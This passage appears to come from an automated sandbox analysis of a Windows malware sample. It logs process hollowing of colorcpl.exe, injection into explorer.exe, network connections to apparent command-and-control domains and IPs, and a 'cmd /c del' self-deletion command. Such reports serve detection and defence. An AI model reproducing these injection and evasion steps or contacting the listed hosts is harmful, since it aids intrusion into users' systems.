            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046FB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047841E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047751BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047751BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047751BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047751BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047769A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047261A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047261A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B49A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04722990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0471C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0473927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047AB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047AB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047BEA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04784257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04734A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04734A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04713A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047BAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047BAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046FAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046FAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04708A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F5210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeNetwork Connect: 52.58.78.16 80
            Source: C:\Windows\explorer.exeNetwork Connect: 142.111.47.2 80
            Source: C:\Windows\explorer.exeDomain query: www.yunlimall.com
            Source: C:\Windows\explorer.exeDomain query: www.thesoulrevitalist.com
            Source: C:\Windows\explorer.exeDomain query: www.cleanxcare.com
            Source: C:\Windows\explorer.exeNetwork Connect: 103.120.12.113 80
            Source: C:\Windows\explorer.exeNetwork Connect: 148.59.128.71 80
            Source: C:\Windows\explorer.exeDomain query: www.newmopeds.com
            Source: C:\Windows\explorer.exeDomain query: www.dmgt4m2g8y2uh.net
            Source: C:\Windows\explorer.exeDomain query: www.hazard-protection.com
            Source: C:\Windows\explorer.exeDomain query: www.jonathan-mandt.com
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exeNetwork Connect: 78.31.67.91 80
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeMemory written: C:\Users\user\Desktop\UOMp9cDcqZ.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeThread register set: target process: 3472
            Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 3472
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeThread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 380000
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess created: C:\Users\user\Desktop\UOMp9cDcqZ.exe C:\Users\user\Desktop\UOMp9cDcqZ.exe
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UOMp9cDcqZ.exe'
            Source: explorer.exe, 00000003.00000000.252387821.0000000001640000.00000002.00000001.sdmp, colorcpl.exe, 0000000F.00000002.493522746.0000000002F80000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000003.00000000.252387821.0000000001640000.00000002.00000001.sdmp, colorcpl.exe, 0000000F.00000002.493522746.0000000002F80000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000003.00000000.252387821.0000000001640000.00000002.00000001.sdmp, colorcpl.exe, 0000000F.00000002.493522746.0000000002F80000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
            Source: explorer.exe, 00000003.00000000.251486008.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
            Source: explorer.exe, 00000003.00000000.252387821.0000000001640000.00000002.00000001.sdmp, colorcpl.exe, 0000000F.00000002.493522746.0000000002F80000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
            Source: explorer.exe, 00000003.00000000.252387821.0000000001640000.00000002.00000001.sdmp, colorcpl.exe, 0000000F.00000002.493522746.0000000002F80000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Users\user\Desktop\UOMp9cDcqZ.exe VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
